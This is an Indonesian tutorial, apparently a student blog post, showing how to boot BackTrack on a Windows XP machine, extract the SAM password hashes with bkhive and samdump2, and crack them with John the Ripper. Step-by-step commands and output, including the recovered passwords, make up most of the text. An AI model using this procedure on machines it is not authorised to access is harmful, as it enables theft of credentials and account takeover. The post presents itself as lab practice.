Ubhara Linux Provocation

Mungkin tulisan saya ini dianggap tidak berguna bagi para guru,
saya tidak menggajak anda untuk melakukan tindakan yang merugikan
bagi khalayak umum tetapi saya hanya ingin membagikan pengalaman saya ini,
tutorial ini saya dapatkan dari http://irongeek.com

persiapan
- CD Backtrack 2 atau 3
- Komputer berOS Windows XP yang akan dijadikan uji coba

*** lets dance ****
1. atur boot squence agar dapat memboot dari cdrom
2. masukan cd backtrack 2 ke dalam cdrom
3. tunggu hingga tampilan login muncul
4. masukan username “root” dan password “toor”
5. periksa apakah drive system windows xp sudah di mount dengan perintah
bt ~ # df -hT
Filesystem    Type    Size  Used Avail Use% Mounted on
tmpfs        tmpfs    108M  416K  108M   1% /
/dev/hda1     ntfs    3.0G  1.6G  1.5G  52% /mnt/hda1

- terlihat bahwa sistem windows telah di mount pada direktory /mnt/hda1 dengan filesystem NTFS

6. untuk memulainya ketikan perintah
bt ~ # bkhive /mnt/hda1/WINDOWS/system32/config/system system.txt
Bkhive ncuomo@studenti.unina.it

Bootkey: 64ca9581144e534fa076a9fa2f4548c0

7. perintah selanjutnya untuk mendapatkan hash password
bt ~ # samdump2 /mnt/hda1/WINDOWS/system32/config/SAM system.txt > passhash.txt
This product includes cryptographic software written
by Eric Young (eay@cryptsoft.com)

No password for user Guest(501)
No password for user SUPPORT_388945a0(1002)

8. pada tahap ini sudah didapatkan hash password, gunakan JTR untuk mencrack passwordnya
bt ~ # /pentest/password/john-1.7.2/run/john –format=NT passhash.txt
Loaded 3 password hashes with no different salts (NT MD4 [TridgeMD4])
passwd           (b13du9)
password         (Administrator)

dapat disimpulkan bahwa user b13du9 menggunakan password “passwd”
dan user Administrator menggunakan password “password”

samdump2, bkhive : http://studenti.unina.it/~mcuomo/syskey/
john the ripper  : http://www.openwall.com/john/

-thx Lab Kompi Fakultas Teknik Universitas Bhayangkara,
semua teman-temanku yang lagi demen-demennya sama OS LINUX.